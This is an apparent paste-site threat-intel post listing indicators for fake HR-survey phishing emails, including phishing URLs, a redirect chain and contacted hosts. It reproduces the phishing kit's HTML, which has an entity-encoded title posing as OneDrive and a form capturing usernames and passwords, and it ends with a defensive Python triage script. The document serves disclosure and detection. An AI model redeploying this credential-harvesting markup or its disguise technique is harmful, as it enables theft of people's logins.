DarthInvader

Fake HR survey phishing email with IOC

Nov 8th, 2018
There were two different phishing attacks using the same survey but different links.

Phishing HR survey email
https://onedrive.live.com/survey?resid=4233E5C045E5D52E!112&authkey=!AL7YH2vI4v1qiUE
==================================================================
Second phishing HR survey email
https://byteonpock.info/fgbv/index.php?starboy=archive
This URL redirects to the URL below, where surf3.php takes a cmd=login_submit parameter along with an id and a session value.

https://byteonpock.info/fgbv/4bcfg9joa27ymwp5dnz6s8r3ti0lkv1xhuq/surf3.php?cmd=login_submit&id=cb3787bf73f099ca0e555210e2aa608acb3787bf73f099ca0e555210e2aa608a&session=cb3787bf73f099ca0e555210e2aa608acb3787bf73f099ca0e555210e2aa608a

Other sites accessed by the PHP files
smallenvelop.com
js.driftt.com

Contents of surf3.php and need2.php below.
=================================================================
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#110;&#101;&#100;&#114;&#105;&#118;&#101;&#46;&#108;&#105;&#118;&#101;&#46;&#99;&#111;&#109;&#47;&#115;&#117;&#114;&#118;&#101;&#121;&#63;&#114;&#101;&#115;&#105;&#100;&#61;&#52;&#50;&#51;&#51;&#69;&#53;&#67;&#48;&#52;&#53;&#69;&#53;&#68;&#53;&#50;&#69;&#33;&#49;&#48;&#53;&#38;&#97;&#117;&#116;&#104;&#107;&#101;&#121;&#61;&#33;&#65;&#70;&#106;&#72;&#100;&#66;&#52;&#105;&#102;&#113;&#86;&#56;&#109;&#80;&#89;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
href="images/favicon.ico"/>
<style type="text/css">
.textbox {
padding-left: 1px;
font-family: "Segoe UI","Tahoma","Helvetica","Arial",sans-serif;
font-size: 14px;
color: #333333;
height: 22px;
width: 275px;
border: 1px solid #959595;
}
</style>
<style type="text/css">
div#container
{
position:relative;
width: 1349px;
margin-top: 0px;
margin-left: auto;
margin-right: auto;
text-align:left;
}
body {text-align:center;margin:0}
</style>
<style>
p{font-size: 40px;}
.loader {
position: fixed;
left: 0px;
top: 0px;
width: 100%;
height: 100%;
z-index: 9999;
background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
opacity: .8;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
$(window).load(function() {
$(".loader").fadeOut("slow");
});
</script>
</head>
<body bgColor="#F2F2F2">
<div class="loader"></div>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:611px; z-index:0"><img src="images/n4.png" alt="" title="" border=0 width=1349 height=611></div>

<div id="image2" style="position:absolute; overflow:hidden; left:428px; top:611px; width:494px; height:268px; z-index:1"><img src="images/n3.png" alt="" title="" border=0 width=494 height=268></div>
<form action=need2.php name=mtlabiyar id=mtlabiyar method=post>
<input name="usr" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:304px;left:467px;top:238px;z-index:2">
<input name="psw" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:304px;left:467px;top:329px;z-index:3">
<select name="fl" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:398px;width:102px;z-index:4">
<option value="No">No</option>
<option value="Yes">Yes</option></select>
<select name="tm" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:461px;width:102px;z-index:5">
<option value="No">No</option>
<option value="Yes">Yes</option></select>
<select name="mg" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:524px;width:102px;z-index:6">
<option value="Yes">Yes</option>
<option value="No">No</option></select>
<select name="jb" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:587px;width:304px;z-index:7">
<option value=""></option>
<option value="Yes">Yes</option>
<option value="Not Realy">Not Realy</option>
<option value="No">No</option></select>
<select name="rw" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:674px;width:102px;z-index:8">
<option value="No">No</option>
<option value="Yes">Yes</option></select>
<div id="formimage1" style="position:absolute; left:456px; top:766px; z-index:9"><input type="image" name="formimage1" width="95" height="38" src="images/nsb.png"></div>
</div>

</body>
</html>


CONTENTS OF need2.php
==================================================================

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#110;&#101;&#100;&#114;&#105;&#118;&#101;&#46;&#108;&#105;&#118;&#101;&#46;&#99;&#111;&#109;&#47;&#115;&#117;&#114;&#118;&#101;&#121;&#63;&#114;&#101;&#115;&#105;&#100;&#61;&#52;&#50;&#51;&#51;&#69;&#53;&#67;&#48;&#52;&#53;&#69;&#53;&#68;&#53;&#50;&#69;&#33;&#49;&#48;&#53;&#38;&#97;&#117;&#116;&#104;&#107;&#101;&#121;&#61;&#33;&#65;&#70;&#106;&#72;&#100;&#66;&#52;&#105;&#102;&#113;&#86;&#56;&#109;&#80;&#89;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
href="images/favicon.ico"/>
<html><meta http-equiv="Refresh" content="05; url=surf2.php"></html>
<style type="text/css">
div#container
{
position:relative;
width: 158px;
margin-top: 0px;
margin-left: auto;
margin-right: auto;
text-align:left;
}
body {text-align:center;margin:0}
</style>
<style>
p{font-size: 40px;}
.loader {
position: fixed;
left: 0px;
top: 0px;
width: 100%;
height: 100%;
z-index: 9999;
background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
opacity: .8;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
$(window).load(function() {
$(".loader").fadeOut("slow");
});
</script>
</head>
<body>
<div class="loader"></div>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:356px; width:158px; height:34px; z-index:0"><img src="images/n1.png" alt="" title="" border=0 width=158 height=34></div>

</div>

</body>
</html>
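
The traits visible in the two captures above (an entity-encoded <title> that decodes to a OneDrive URL, a password field rendered as type="text", a meta refresh to surf2.php, and third-party asset hosts) can be checked mechanically when triaging a saved page. The Python script below is an added example, not part of the original paste; the names PageTriage, triage and CRED_NAME and the reduced SAMPLE markup are constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a reduced mix of the surf3.php and need2.php markup above.
SAMPLE = """<html><head>
<title>&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#110;&#101;&#100;&#114;&#105;&#118;&#101;&#46;&#108;&#105;&#118;&#101;&#46;&#99;&#111;&#109;</title>
<meta http-equiv="Refresh" content="05; url=surf2.php">
<style>.loader{background:url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif')}</style>
</head><body><form action=need2.php method=post>
<input name="usr" type="text"><input name="psw" type="text">
</body></html>"""

CRED_NAME = re.compile(r"^(psw|pwd|pass(word|wd)?)$", re.I)  # assumed field names

class PageTriage(HTMLParser):
    """Collects two kit traits: unmasked password inputs and meta-refresh hops."""
    def __init__(self):
        super().__init__()
        self.findings, self.action = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":  # the captured form is never closed, so keep the action
            self.action = a.get("action") or ""
        elif tag == "input" and self.action is not None:
            kind = (a.get("type") or "text").lower()
            if CRED_NAME.match(a.get("name") or "") and kind != "password":
                self.findings.append(f"unmasked credential field '{a['name']}' posts to '{self.action}'")
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            hop = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            if hop:
                self.findings.append(f"meta refresh to '{hop.group(1)}'")

def triage(raw, served_from):
    """Return (findings, external hosts) for one captured page."""
    parser = PageTriage()
    parser.feed(raw)
    findings = list(parser.findings)
    title = re.search(r"<title>(.*?)</title>", raw, re.I | re.S)
    if title and re.search(r"&#\d+;", title.group(1)):
        # Decode the numeric entities and compare the displayed host with the real one.
        shown = urlparse(html.unescape(title.group(1)).strip()).hostname
        if shown and shown != served_from:
            findings.append(f"entity-encoded title shows '{shown}', page served from '{served_from}'")
    hosts = sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", raw)))
    return findings, hosts

if __name__ == "__main__":
    for line in triage(SAMPLE, "byteonpock.info")[0]:
        print(line)
```

The host list returned alongside the findings covers both attribute URLs and CSS url() references, which is how smallenvelop.com surfaces here.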